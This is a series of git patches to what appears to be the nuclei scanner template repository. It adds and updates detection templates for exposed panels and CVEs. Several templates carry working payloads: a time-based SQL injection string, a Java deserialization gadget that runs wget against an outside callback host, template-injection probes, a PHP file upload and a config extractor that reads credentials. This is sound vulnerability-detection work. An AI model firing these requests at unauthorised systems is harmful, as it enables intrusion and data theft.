http/exposed-panels/tracer-sc-login.yaml:57902ac871a95304f034d0aa4a2cb96f04cad2a6 http/exposed-panels/traefik-dashboard.yaml:19db275a7effc62cc9fee16ae6e6b4ac81b98635 +http/exposed-panels/trellix-panel.yaml:1fe6fdd35d63a0e347e24a780b7fa57a6e62507e http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml:d2198b812f4062c0f360ef2cc7e590547d75bc83 http/exposed-panels/truenas-scale-panel.yaml:56f855f113eb0d8fe648485a1ba0ea24988ae7da http/exposed-panels/tufin-securetrack-login.yaml:63c396fb780b3aa5de4176aea0e183338ef43943 @@ -6777,7 +6778,7 @@ http/technologies/4D-detect.yaml:4b948a54eb2718980daa15d0ce2aaf5ee1bf843b http/technologies/abyss-web-server.yaml:2fffb4cde6c7f55d76d6e75695407b177e97455f http/technologies/acontent-detect.yaml:3a895300f93df22d858994bf6851a82f9d38c7d9 http/technologies/activecollab-detect.yaml:ec9b319d550d4c03dbf396dbd92cba208a2accb6 -http/technologies/adfs-detect.yaml:a4af4605bb3fdece63c949a9888ec1bdc3cebe3b +http/technologies/adfs-detect.yaml:c6cdb0d6cd9a83ffb3031fa3c516db8754023aa2 http/technologies/admiralcloud-detect.yaml:da6d0bbd87f6e8d763a702761b8f766f235b7b3c http/technologies/adobe/adobe-coldfusion-detect.yaml:cef3ba34ad6eeb269af4e347a9a3d01c4ae652ce http/technologies/adobe/adobe-coldfusion-error-detect.yaml:b8d234bd0084312dd8ec87cab1aac821c0fdd562 @@ -6808,7 +6809,7 @@ http/technologies/apache/kafka-manager-panel.yaml:dc3bc4035bc4069f3529349675f2c3 http/technologies/apache/ranger-detection.yaml:15fbdedf1fbe105e4bdbb03b8c6a449097801a74 http/technologies/apache/tomcat-detect.yaml:91e9fd95e5188f7b4529a787f1a7da29335c0647 http/technologies/apache/xampp-default-page.yaml:1a2e9ae4aef8adc79a4a34e693b351bfcc23f8f9 -http/technologies/apache-allura-detect.yaml:e1a5f9c5175f80d3e42b561b5ac86c60ab67ab90 +http/technologies/apache-allura-detect.yaml:15c34736226f419e17b17aec0fe92f2171cd1cb8 http/technologies/apollo-server-detect.yaml:44245d09c9ad3e3fbca5d699041ac2bd23d329f2 http/technologies/appcms-detect.yaml:1e4a5703053e47d171007ea981900427a88bfab6 http/technologies/apple-httpserver.yaml:17b86c19f29316954819f862cc7d1e371890f4cd @@ -8760,7 +8761,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:612219ec483cfbf49ea1aadee0315d20d21cfc75 +templates-checksum.txt:6ed577d2c4a74d9cab921a1814059b33f5114009 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e69e327de98df0fbd875c43b94cf0fa15f50fbf3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 24 Jun 2024 08:15:19 +0000 Subject: [PATCH 0534/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ab4b48140b..0c51569872 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -111,6 +111,7 @@ on: - 'http/default-logins/mantisbt/mantisbt-anonymous-login.yaml' - 'http/exposed-panels/lorex-panel.yaml' - 'http/exposed-panels/oracle-application-server-panel.yaml' + - 'http/exposed-panels/trellix-panel.yaml' - 'http/exposed-panels/turnkey-lamp-panel.yaml' - 'http/exposed-panels/veeam-backup-manager-login.yaml' - 'http/exposed-panels/wildix-collaboration-panel.yaml' From 0a551a35b01017ffc27ca662d510fbbffa93e32a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 24 Jun 2024 08:16:30 +0000 Subject: [PATCH 0535/1841] Auto Template Signing [Mon Jun 24 08:16:30 UTC 2024] :robot: --- http/exposed-panels/trellix-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/trellix-panel.yaml b/http/exposed-panels/trellix-panel.yaml index 9109b3466f..b8f512f18e 100644 --- a/http/exposed-panels/trellix-panel.yaml +++ b/http/exposed-panels/trellix-panel.yaml @@ -33,3 +33,4 @@ http: part: header kval: - Server +# digest: 4b0a00483046022100e75d706651228c9ab35c6063bad8ac906e6c0d663a7015161fd55e51e842f5aa022100df457dec552fd44de2211ed91a1df31c867f2f0c42d143ee00cdba05caa1ad30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 197711ba5e196d086d3a0887ca10622c9466bba4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 24 Jun 2024 14:05:07 +0530 Subject: [PATCH 0536/1841] minor update --- http/cves/2024/CVE-2024-3922.yaml | 28 +++++++++++++++++++++++++--- 1 file changed, 25 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-3922.yaml b/http/cves/2024/CVE-2024-3922.yaml index c38b4e98aa..1b902ca27b 100644 --- a/http/cves/2024/CVE-2024-3922.yaml +++ b/http/cves/2024/CVE-2024-3922.yaml @@ -1,18 +1,40 @@ id: CVE-2024-3922 + info: - name: Dokan Pro <= 3.10.3 SQL Injection + name: Dokan Pro <= 3.10.3 - Unauthenticated SQL Injection author: securityforeveryone severity: critical description: | - The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. + impact: | + Unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + remediation: Fixed in 3.11.0 reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-3922 - https://dokan.co/docs/wordpress/changelog/ - tags: cve,cve2024,dokan,wp-plugin + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/dokan-pro/" + tags: cve,cve2024,dokan,wp-plugin,wordpress,wp,dokan-pro + +flow: http(1) && http(2) http: - raw: - | + GET /wp-content/plugins/dokan-pro/changelog.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + words: + - 'Dokan product' + internal: true + + - raw: + - | + @timeout: 20s POST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1 Host: {{Hostname}} From f01b01302c62c81307137960c4245cb3ff569c89 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 24 Jun 2024 14:13:31 +0530 Subject: [PATCH 0537/1841] minor update --- http/cves/2024/CVE-2024-4443.yaml | 36 +++++++++++++++++++++++++------ 1 file changed, 29 insertions(+), 7 deletions(-) diff --git a/http/cves/2024/CVE-2024-4443.yaml b/http/cves/2024/CVE-2024-4443.yaml index 77dc1ea74d..feabf68b93 100644 --- a/http/cves/2024/CVE-2024-4443.yaml +++ b/http/cves/2024/CVE-2024-4443.yaml @@ -1,11 +1,14 @@ id: CVE-2024-4443 info: - name: Business Directory < 6.4.3 SQL Injection + name: Business Directory Plugin – Easy Listing Directories for WordPress <= 6.4.2 - Unauthenticated SQL Injection via listingfields Parameter author: securityforeveryone severity: critical description: | - The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘listingfields’ parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘listingfields’ parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. + impact: | + Unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + remediation: Fixed in 6.4.3. reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-4443 - https://plugins.trac.wordpress.org/browser/business-directory-plugin/trunk/includes/fields/class-fieldtypes-select.php#L110 @@ -17,17 +20,36 @@ info: cve-id: CVE-2024-4443 epss-score: 0.00063 epss-percentile: 0.27036 - tags: sqli,vuln,cve,cve2024,wp-plugin + metadata: + verified: true + max-request: 2 + publicwww-query: "/wp-content/plugins/business-directory-plugin/" + tags: cve,cve2024,sqli,business-directory,wordpress,wp-plugin + +flow: http(1) && http(2) http: - - method: GET - path: - - "{{BaseURL}}/business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[+or+sleep(if(1%3d1,4,0))+))--+-][1]=" + - raw: + - | + GET /wp-content/plugins/business-directory-plugin/README.TXT HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + words: + - 'Business Directory Plugin' + internal: true + + - raw: + - | + @timeout: 20s + POST /business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[+or+sleep(if(1%3d1,6,0))+))--+-][1]= HTTP/1.1 + Host: {{Hostname}} matchers: - type: dsl dsl: - - 'duration>=4' + - 'duration>=6' - 'status_code == 200' - 'contains_all(body,"Business Directory","No listings found")' condition: and From 0d6238b97ba1b914a4040c373d4315d0daf6c6a5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 24 Jun 2024 16:24:10 +0530 Subject: [PATCH 0538/1841] fix template --- http/cves/2020/CVE-2020-10189.yaml | 104 ++++++++++++++--------------- 1 file changed, 50 insertions(+), 54 deletions(-) diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml index 5c7e88c67e..a6332680e6 100644 --- a/http/cves/2020/CVE-2020-10189.yaml +++ b/http/cves/2020/CVE-2020-10189.yaml @@ -4,70 +4,66 @@ info: name: ManageEngine Desktop Central Java Deserialization author: king-alexander severity: critical - remediation: Apply updates per vendor instructions. - description: Zoho ManageEngine Desktop Central before 10.0.474 is vulnerable to a deserialization of untrusted data, which permits remote code execution. + description: | + Zoho ManageEngine Desktop Central before 10.0.474 is vulnerable to a deserialization of untrusted data, which permits remote code execution. + remediation: | + Apply updates per vendor instructions. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-10189 - - https://packetstormsecurity.com/files/156730/ManageEngine-Desktop-Central-Java-Deserialization.html - - https://srcincite.io/pocs/src-2020-0011.py.txt + - https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189 - https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html - tags: cve,cve2020,kev + - https://y4er.com/posts/cve-2020-10189-zoho-manageengine-rce/ + - https://cwe.mitre.org/data/definitions/502.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-10189 + cwe-id: CWE-502 + epss-score: 0.97206 + epss-percentile: 0.99826 + cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: zohocorp + product: manageengine_desktop_central + fofa-query: + - body="manageengine desktop central 10" + - title="manageengine desktop central 10" + - app="zoho-manageengine-desktop" + shodan-query: http.title:"manageengine desktop central 10" + google-query: intitle:"manageengine desktop central 10" + tags: cve,cve2020,kev,zoho,manageengine,deserialization,intrusive + +flow: http(1) && http(2) http: - # detect vulnerable version - - method: GET - path: - - "https://{{Host}}:8383/configurations.do" + - raw: + - | + POST /mdm/client/v1/mdmLogUploader?udid=si%5C..%5C..%5C..%5Cwebapps%5CDesktopCentral%5C_chart&filename=logger.zip HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/octet-stream - extractors: - - type: regex - name: version + {{generate_java_gadget("commons-collections3.1","wget http://{{interactsh-url}}","raw")}} + + matchers: + - type: status + status: + - 200 internal: true - group: 1 - regex: - - "^([0-9.]+)?([0-9.]+)?([0-9]+)$" + + - raw: + - | + POST /cewolf/?img=%5Clogger.zip HTTP/1.1 + Host: {{Hostname}} matchers-condition: and matchers: - - type: status - status: - - 200 - - - type: word - words: - - "ManageEngine Desktop Central" - - - type: dsl - dsl: - - compare_versions(version, '<10.0.474') - - # arbitrary file write - - method: POST - headers: - Content-Type: application/octet-stream - path: - # 'udid' is entirely attacker-controlled and 'logger.zip' is an allow-listed filename - - "https://{{Host}}:8383/mdm/client/v1/mdmLogUploader?udid={{rand_int()}}&filename=logger.zip" - # generate a serialized raw bytes payload - body: '{{generate_java_gadget("commons-collections3.1","wget http://{{interactsh-url}}","raw")}}' - - matchers: - - type: status - status: - - 200 - - # deserialization - - method: POST - path: - - "https://{Host}:8383/cewolf/{{File}}?img=\\logger.zip" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word part: interactsh_protocol words: - - "http" + - "dns" + + - type: status + status: + - 200 From 96e47552d1caa4d21c578b4e0709232bea78a9d9 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Mon, 24 Jun 2024 16:51:36 +0300 Subject: [PATCH 0539/1841] add bagisto csti vuln --- http/vulnerabilities/other/bagisto-csti.yaml | 31 ++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/vulnerabilities/other/bagisto-csti.yaml diff --git a/http/vulnerabilities/other/bagisto-csti.yaml b/http/vulnerabilities/other/bagisto-csti.yaml new file mode 100644 index 0000000000..1d8436c9d7 --- /dev/null +++ b/http/vulnerabilities/other/bagisto-csti.yaml @@ -0,0 +1,31 @@ +id: bagisto-csti + +info: + name: Bagisto 2.1.2 Client-Side Template Injection + author: securityforeveryone + severity: medium + description: | + Bagisto is vulnerable to Client-Side Template Injection (CSTI), which allows an attacker to execute arbitrary code on the server. + reference: + - https://packetstormsecurity.com/files/179153/Bagisto-2.1.2-Client-Side-Template-Injection.html + - https://demo.bagisto.com/ + tags: packetstorm,bagisto,csti + +http: + - raw: + - | + GET /search?query={{_openBlock.constructor('alert(document.domain)')()}} HTTP/1.1 + Host: {{Hostname}} + + - raw: + - | + GET /search?query={{-function(){this.alert(document.domain)}()}} HTTP/1.1 + Host: {{Hostname}} + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'contains_all(body,"alert(document.domain)","Search results")' + - 'status_code==200' + condition: and \ No newline at end of file From a5405d91f4aabb5ac4613b36f49f1b1c10a86ca9 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Mon, 24 Jun 2024 16:53:00 +0300 Subject: [PATCH 0540/1841] fix --- http/vulnerabilities/other/bagisto-csti.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/other/bagisto-csti.yaml b/http/vulnerabilities/other/bagisto-csti.yaml index 1d8436c9d7..c4d4620ed2 100644 --- a/http/vulnerabilities/other/bagisto-csti.yaml +++ b/http/vulnerabilities/other/bagisto-csti.yaml @@ -28,4 +28,4 @@ http: dsl: - 'contains_all(body,"alert(document.domain)","Search results")' - 'status_code==200' - condition: and \ No newline at end of file + condition: and From eb339a80a43fb55d96bbc3f841e7e31d035a9842 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Mon, 24 Jun 2024 16:55:44 +0300 Subject: [PATCH 0541/1841] add cve-2021-4436 --- http/cves/2021/CVE-2021-4436.yaml | 58 +++++++++++++++++++++++++++++++ 1 file changed, 58 insertions(+) create mode 100644 http/cves/2021/CVE-2021-4436.yaml diff --git a/http/cves/2021/CVE-2021-4436.yaml b/http/cves/2021/CVE-2021-4436.yaml new file mode 100644 index 0000000000..f1639e3783 --- /dev/null +++ b/http/cves/2021/CVE-2021-4436.yaml @@ -0,0 +1,58 @@ +id: CVE-2021-4436 + +info: + name: 3DPrint Lite < 1.9.1.5 - Arbitrary File Upload + author: securityforeveryone + severity: critical + description: | + The plugin does not have any authorisation and does not check the uploaded file in its p3dlite_handle_upload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache. + remediation: Fixed in 1.9.1.5 + reference: + - https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-4436 + - https://github.com/fkie-cad/nvd-json-data-feeds + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-4436 + cwe-id: CWE-434 + epss-score: 0.00412 + epss-percentile: 0.73863 + cpe: cpe:2.3:a:wp3dprinting:3dprint_lite:*:*:*:*:*:wordpress:*:* + metadata: + vendor: wp3dprinting + product: 3dprint_lite + framework: wordpress + tags: wpscan,wordpress,intrusive,cve2021,cve + +http: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353 + + -----------------------------54331109111293931601238262353 + Content-Disposition: form-data; name="action" + + p3dlite_handle_upload + -----------------------------54331109111293931601238262353 + Content-Disposition: form-data; name="file"; filename="vuln_check.php" + Content-Type: text/php + + + -----------------------------54331109111293931601238262353-- + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"jsonrpc":"2.0"' + - '"filename"' + - '_vuln_check.php' + condition: and + + - type: status + status: + - 200 From 3e84ab381b0d3c08835efddfb4e0ad28e7ee4564 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Mon, 24 Jun 2024 17:17:21 +0300 Subject: [PATCH 0542/1841] fix --- http/cves/2021/CVE-2021-4436.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2021/CVE-2021-4436.yaml b/http/cves/2021/CVE-2021-4436.yaml index f1639e3783..a39e58486c 100644 --- a/http/cves/2021/CVE-2021-4436.yaml +++ b/http/cves/2021/CVE-2021-4436.yaml @@ -53,6 +53,6 @@ http: - '_vuln_check.php' condition: and - - type: status - status: - - 200 + - type: status + status: + - 200 From a400f743d554cdbe4d9a765e009597808b0ac42a Mon Sep 17 00:00:00 2001 From: fullstackpotato Date: Mon, 24 Jun 2024 16:50:33 +0100 Subject: [PATCH 0543/1841] cvss fix --- network/default-login/ftp-weak-credentials.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/default-login/ftp-weak-credentials.yaml b/network/default-login/ftp-weak-credentials.yaml index f8d178d8e1..5c5200f76b 100644 --- a/network/default-login/ftp-weak-credentials.yaml +++ b/network/default-login/ftp-weak-credentials.yaml @@ -8,7 +8,7 @@ info: reference: - https://docs.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/ftpserver/security/authentication/ classification: - cvss-metrics: 3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N cvss-score: 8.5 metadata: max-request: 1 From bd76fc049ae6876e7fcf96104612012bb39d31bf Mon Sep 17 00:00:00 2001 From: Icaro Torres <18042205+icarot@users.noreply.github.com> Date: Mon, 24 Jun 2024 13:47:50 -0300 Subject: [PATCH 0544/1841] Create neo4j-neodash-detect.yaml Detects a Neo4j Neodash web application, a Dashboard Builder for Neo4j. --- http/technologies/neo4j-neodash-detect.yaml | 32 +++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/technologies/neo4j-neodash-detect.yaml diff --git a/http/technologies/neo4j-neodash-detect.yaml b/http/technologies/neo4j-neodash-detect.yaml new file mode 100644 index 0000000000..e65cb10513 --- /dev/null +++ b/http/technologies/neo4j-neodash-detect.yaml @@ -0,0 +1,32 @@ +id: neo4j-neodash-detect + +info: + name: Neo4j Neodash Detection + author: icarot + severity: info + description: | + Detects a Neo4j Neodash web application, a Dashboard Builder for Neo4j. + classification: + cpe: cpe:2.3:a:neo4j:*:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: neo4j + product: neodash + tags: tech,neodash,neo4j,detect + +http: + - method: GET + path: + - "{{BaseURL}}/" + + matchers-condition: and + matchers: + - type: word + words: + - 'NeoDash - Neo4j Dashboard Builder' + - 'Neo4j Dashboard Builder' + condition: and + + - type: status + status: + - 200 From 3b02b45a002a472ffd8bee83601adc945421d326 Mon Sep 17 00:00:00 2001 From: Icaro Torres <18042205+icarot@users.noreply.github.com> Date: Mon, 24 Jun 2024 13:49:57 -0300 Subject: [PATCH 0545/1841] Create neo4j-neodash-configexposed.yaml Detects the file config.json from Neo4j Neodash web application, it contains information about DB connection with Neo4J. --- .../configs/neo4j-neodash-configexposed.yaml | 39 +++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/exposures/configs/neo4j-neodash-configexposed.yaml diff --git a/http/exposures/configs/neo4j-neodash-configexposed.yaml b/http/exposures/configs/neo4j-neodash-configexposed.yaml new file mode 100644 index 0000000000..f2cafd6d7d --- /dev/null +++ b/http/exposures/configs/neo4j-neodash-configexposed.yaml @@ -0,0 +1,39 @@ +id: neo4j-neodash-configexposed + +info: + name: Neo4j Neodash Detection + author: icarot + severity: medium + description: | + Detects the file config.json from Neo4j Neodash web application, it contains information about DB connection with Neo4J. + classification: + cpe: cpe:2.3:a:neo4j:*:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: neo4j + product: neodash + tags: config,exposure,credential,neodash,neo4j + +http: + - method: GET + path: + - "{{BaseURL}}/config.json" + + matchers-condition: and + matchers: + - type: word + words: + - 'standaloneHost' + - 'standalonePort' + - 'standaloneDatabase' + condition: and + + - type: status + status: + - 200 + extractors: + - type: json + name: config.json + part: body + json: + - '.standaloneHost,.standalonePort,.standaloneDatabase,.standaloneUsername,.standalonePassword,.standaloneDashboardName' From 8c65770e5f1e81eab8105408a6247159190d5cde Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 24 Jun 2024 19:03:51 +0200 Subject: [PATCH 0546/1841] Update ibm-odm-panel.yaml --- http/exposed-panels/ibm/ibm-odm-panel.yaml | 17 ++++++++++++++--- 1 file changed, 14 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/ibm/ibm-odm-panel.yaml b/http/exposed-panels/ibm/ibm-odm-panel.yaml index 1066baf060..97dbc11794 100644 --- a/http/exposed-panels/ibm/ibm-odm-panel.yaml +++ b/http/exposed-panels/ibm/ibm-odm-panel.yaml @@ -2,16 +2,18 @@ id: ibm-odm-panel info: name: IBM Operational Decision Manager Panel - Detect - author: DhiyaneshDK + author: DhiyaneshDK,righettod severity: info description: | IBM Operational Decision Manager panel was detected. reference: - https://www.ibm.com/docs/en/odm/8.12.0 + - https://www.ibm.com/products/operational-decision-manager metadata: verified: true max-request: 1 fofa-query: title="Decision Center | Business Console" + shodan-query: http.title:"Decision Center | Business Console" tags: panel,ibm,login,detect,decision-center http: @@ -24,9 +26,18 @@ http: - type: word part: body words: - - "Decision Center | Business Console" + - 'Decision Center | Business Console' + - '

Decision Center | Business Console

' + - 'com/ibm/rules/decisioncenter/setup/Login' + condition: or - type: status status: - 200 -# digest: 4a0a004730450221008a3b3de13561d846fb75ff0b72e581d81d042e0923570e71d5a5b78e4569531302207176f9a0fbf8ec224abd85e32b019c6382610312f94208ef3a358187150fb17d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)"js/dist/([0-9.]+)/decisioncenter"' From f19782b84bb72758731e64fbeaee3934171f0b8f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 24 Jun 2024 22:40:57 +0530 Subject: [PATCH 0547/1841] minor update --- http/cves/2021/CVE-2021-4436.yaml | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/http/cves/2021/CVE-2021-4436.yaml b/http/cves/2021/CVE-2021-4436.yaml index a39e58486c..ab6349dde8 100644 --- a/http/cves/2021/CVE-2021-4436.yaml +++ b/http/cves/2021/CVE-2021-4436.yaml @@ -20,10 +20,17 @@ info: epss-percentile: 0.73863 cpe: cpe:2.3:a:wp3dprinting:3dprint_lite:*:*:*:*:*:wordpress:*:* metadata: + verified: true + max-request: 1 vendor: wp3dprinting product: 3dprint_lite framework: wordpress - tags: wpscan,wordpress,intrusive,cve2021,cve + publicwww-query: "/wp-content/plugins/3dprint-lite/" + tags: cve,cve2021,3dprint-lite,file-upload,instrusive,wpscan,wordpress,wp-plugin,intrusive + +variables: + string: "{{randstr}}" + filename: "{{to_lower(rand_text_alpha(5))}}" http: - raw: @@ -37,10 +44,10 @@ http: p3dlite_handle_upload -----------------------------54331109111293931601238262353 - Content-Disposition: form-data; name="file"; filename="vuln_check.php" + Content-Disposition: form-data; name="file"; filename="{{filename}}.php" Content-Type: text/php - + -----------------------------54331109111293931601238262353-- matchers-condition: and @@ -49,8 +56,8 @@ http: part: body words: - '"jsonrpc":"2.0"' - - '"filename"' - - '_vuln_check.php' + - '"filename":' + - '{{filename}}.php' condition: and - type: status From 571a7ad4dba5225cdc61a7d5b34b904960d625a9 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 24 Jun 2024 19:41:42 +0200 Subject: [PATCH 0548/1841] Update ibm-service-assistant.yaml --- .../exposed-panels/ibm/ibm-service-assistant.yaml | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/ibm/ibm-service-assistant.yaml b/http/exposed-panels/ibm/ibm-service-assistant.yaml index 41454043dc..fb29586b06 100644 --- a/http/exposed-panels/ibm/ibm-service-assistant.yaml +++ b/http/exposed-panels/ibm/ibm-service-assistant.yaml @@ -2,16 +2,18 @@ id: ibm-service-assistant info: name: IBM Service Assistant Login Panel - Detect - author: dhiyaneshDK + author: dhiyaneshDK,righettod severity: info description: IBM Service Assistant login panel was detected. + reference: + - https://mediacenter.ibm.com/media/Using+the+IBM+Support+Assistant/0_ffe9o5w1 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: max-request: 1 shodan-query: http.title:"Welcome to Service Assistant" - tags: panel,ibm,service + tags: panel,ibm,service,login,detect http: - method: GET @@ -27,4 +29,11 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009dfb2b04022e1d677249671c42cfa583257d74854eb9e09d614c77a50e443e9e02201795f12826ce8883a64aa98673a48224e65016d081a8c7b415709f8469ad17d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)([a-z0-9\s]+)\s+Service\s+Assistant\s+Tool' + - '(?i)svcProductMtm\s+=\s+.?([0-9a-z\-]+).?' From 02d98e0bbedfd71087e3cfa1afd322baf802e809 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 24 Jun 2024 19:47:50 +0200 Subject: [PATCH 0549/1841] Fix linter error --- http/exposed-panels/ibm/ibm-service-assistant.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/ibm/ibm-service-assistant.yaml b/http/exposed-panels/ibm/ibm-service-assistant.yaml index fb29586b06..dbf164ab65 100644 --- a/http/exposed-panels/ibm/ibm-service-assistant.yaml +++ b/http/exposed-panels/ibm/ibm-service-assistant.yaml @@ -6,7 +6,7 @@ info: severity: info description: IBM Service Assistant login panel was detected. reference: - - https://mediacenter.ibm.com/media/Using+the+IBM+Support+Assistant/0_ffe9o5w1 + - https://mediacenter.ibm.com/media/Using+the+IBM+Support+Assistant/0_ffe9o5w1 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 @@ -34,6 +34,6 @@ http: - type: regex part: body group: 1 - regex: + regex: - '(?i)([a-z0-9\s]+)\s+Service\s+Assistant\s+Tool' - '(?i)svcProductMtm\s+=\s+.?([0-9a-z\-]+).?' From d55ca31ed42b76d105a3bf9b6067451204cbfbd1 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 24 Jun 2024 20:13:12 +0200 Subject: [PATCH 0550/1841] Update ibm-advanced-system-management.yaml --- .../ibm/ibm-advanced-system-management.yaml | 18 +++++++++++++----- 1 file changed, 13 insertions(+), 5 deletions(-) diff --git a/http/exposed-panels/ibm/ibm-advanced-system-management.yaml b/http/exposed-panels/ibm/ibm-advanced-system-management.yaml index e242b127b0..0a61fbcbbe 100644 --- a/http/exposed-panels/ibm/ibm-advanced-system-management.yaml +++ b/http/exposed-panels/ibm/ibm-advanced-system-management.yaml @@ -2,29 +2,37 @@ id: ibm-advanced-system-management info: name: IBM Advanced System Management Panel - Detect - author: dhiyaneshDK + author: dhiyaneshDK,righettod severity: info description: IBM Advanced System Management panel was detected. + reference: + - https://www.ibm.com/docs/en/power8/9080-MME?topic=operations-advanced-system-management classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: max-request: 1 shodan-query: http.title:"Advanced System Management" - tags: panel,ibm + tags: panel,ibm,login,detect http: - method: GET path: - - '{{BaseURL}}/cgi-bin/cgi' + - '{{BaseURL}}/cgi-bin/cgi?form=1' matchers-condition: and matchers: - type: word words: - - 'Advanced System Management' + - 'Advanced System Management' - type: status status: - 200 -# digest: 